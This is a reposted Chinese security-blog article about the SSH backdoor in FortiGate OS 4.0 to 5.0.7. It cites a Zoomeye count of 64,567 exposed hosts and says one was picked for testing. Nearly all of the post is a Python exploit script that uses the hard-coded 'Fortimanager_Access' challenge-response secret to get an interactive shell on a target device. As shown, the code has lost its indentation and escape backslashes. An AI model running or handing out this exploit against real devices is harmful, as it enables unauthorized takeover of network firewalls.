紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!

admin 2021年7月25日22:30:19评论52 views字数 1821阅读6分4秒阅读模式

通过过Zoomeye搜索发现存在 64567台主机,

紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!

挑选一台进行测试

紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!


测试代码:


#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

def custom_handler(title, instructions, prompt_list):
n = prompt_list[0][0]
m = hashlib.sha1()
m.update('x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('xA3x88xBAx2Ex42x4CxB0x4Ax53x79x30xC1x31x07xCCx3FxA1x32x90x29xA9x81x5Bx70')
h = 'AK1' + base64.b64encode('x00' * 12 + m.digest())
return [h]


def main():
if len(sys.argv) < 2:
print 'Usage: ' + sys.argv[0] + ' <target-ip>'
exit(-1)

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:
client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass

trans = client.get_transport()
try:
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass

trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
chan = client.invoke_shell()

oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)

while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('rn*** EOFrn')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)

finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)


if __name__ == '__main__':
main()


From:http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html


本文始发于微信公众号(T00ls):紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日22:30:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!http://cn-sec.com/archives/351720.html

发表评论

匿名网友 填写信息